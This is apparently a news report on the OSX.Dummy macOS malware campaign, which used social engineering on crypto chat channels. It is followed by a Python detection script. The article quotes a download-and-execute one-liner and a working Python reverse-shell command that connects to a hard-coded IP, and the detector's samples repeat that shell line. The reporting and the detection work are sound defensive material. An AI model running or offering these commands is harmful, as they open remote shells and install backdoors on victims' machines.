Someone impersonating administrators of cryptocurrency-related discussion channels on Slack, Discord, and other social messaging platforms has been attempting to lure others into installing macOS malware. The social-engineering campaign consists of posting a script in discussions and encouraging people to copy and paste that script into a Terminal window on their Macs. The command downloads a huge (34 megabyte) file and executes it, establishing a remote connection that acts as a backdoor for the attacker.
Peter Wardle, a Mac malware expert, also examined the malware and dubbed it “OSX.Dummy” because, as he wrote:
the infection technique is dumb
the huge size of the binary is dumb
the persistence mechanism is lame (and thus also dumb)
the capabilities are slightly restricted (and thus slightly dumb)
it is trivial to detect at each step (that dumb)
… and finally, the malware saves the user’s password to dumpdummy
The attack, first noted by Remco Verhoef of SANS today, downloads its unwieldy payload from a remote server, makes that file executable, and runs it. It looks something like this:
cd /tmp && curl -s curl $MALICIOUS_URL > script && chmod +x script && ./script
The monster binary carries with it several libraries, including OpenSSL libraries to encrypt its communications back to the server—a system running in a data center of the hosting provider CrownCloud. Once it executes, it uses the sudo command to make itself owned by macOS’s root user. For this to happen, the victim has to enter a password to allow the script to continue. The script stores that password in a temporary file called “dumpdummy”. The script also issues commands to add itself to the startup list for macOS—making itself persistent.
The script’s backdoor code, as Wardle noted, is a recursive Python command-line call with a hard-coded IP address for the connection that uses port 1337—an obvious leetspeak joke.
python -c 'import socket,subprocess,os; s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect(("220.127.116.11",1337)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); p=subprocess.call(["/bin/sh","-i"]);'
The attacker’s intent is not yet clear. But because all of this executes through a Terminal window, it bypasses macOS’s Gatekeeper malware protection, despite being unsigned code. And it gives the attacker the ability to execute command-line code as the root user on infected Macs. Of course, the code has to overcome the common sense of the victim as well.
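As an added example (not code from the original article or from Wardle's analysis), the Python sketch below flags the two command-line shapes quoted above in shell history or process telemetry: a file that is fetched, made executable and run in one line, and inline Python that wires a socket onto stdin/stdout before starting a shell. The rule names, regular expressions and sample lines are assumptions constructed for illustration.

```python
import re

# Step patterns for the pasted chain: fetch to a file, chmod it, run it.
FETCH = re.compile(r"\b(?:curl|wget)\b[^|;&]*?(?:>\s*|\s-[oO]\s+)(\S+)")
CHMOD = re.compile(r"\bchmod\s+(?:[ugoa]*\+x|[0-7]?7[0-7]{2})\s+(\S+)")
RUN = re.compile(r"(?:^|&&|;)\s*\./(\S+)")
# Pieces of the socket-to-shell one-liner quoted in the article.
PY_INLINE = re.compile(r"\bpython[\d.]*\s+-c\b")
DUP2 = re.compile(r"os\.dup2\(\s*\w+\.fileno\(\)\s*,\s*([012])\s*\)")
SHELL = re.compile(r"/bin/(?:ba|z|da)?sh\b")


def _name(path):
    """Normalise './script' and quoted names to a bare file name."""
    return re.sub(r"^\./", "", path.strip("'\""))


def download_and_run(cmd):
    """True when one file is fetched, made executable and run in a single line."""
    fetched = {_name(p) for p in FETCH.findall(cmd)}
    made_exec = {_name(p) for p in CHMOD.findall(cmd)}
    ran = {_name(p) for p in RUN.findall(cmd)}
    return bool(fetched & made_exec & ran)


def socket_shell(cmd):
    """True when inline Python puts a socket on stdin/stdout and starts a shell."""
    fds = set(DUP2.findall(cmd))
    return bool(PY_INLINE.search(cmd) and "socket.socket(" in cmd
                and {"0", "1"} <= fds and SHELL.search(cmd))


def triage(cmd):
    """Return the names of the rules a command line matches."""
    rules = (("download-and-run", download_and_run), ("socket-shell", socket_shell))
    return [name for name, check in rules if check(cmd)]


# Constructed samples (placeholder URL, documentation-range IP), not captured data.
SAMPLES = [
    "cd /tmp && curl -s curl $MALICIOUS_URL > script && chmod +x script && ./script",
    "curl -s https://example.com/notes.txt > notes.txt && chmod 644 notes.txt",
    "python -c 'import socket,subprocess,os; s=socket.socket(socket.AF_INET,"
    "socket.SOCK_STREAM); s.connect((\"192.0.2.10\",1337)); os.dup2(s.fileno(),0); "
    "os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); subprocess.call([\"/bin/sh\",\"-i\"])'",
    "python -c 'import socket; print(socket.gethostname())'",
]

if __name__ == "__main__":
    for line in SAMPLES:
        print(triage(line) or ["clean"], "<-", line[:60])
```

The download rule only fires when the same file name appears in all three steps, so an ordinary download that is never executed (the second sample) stays clean.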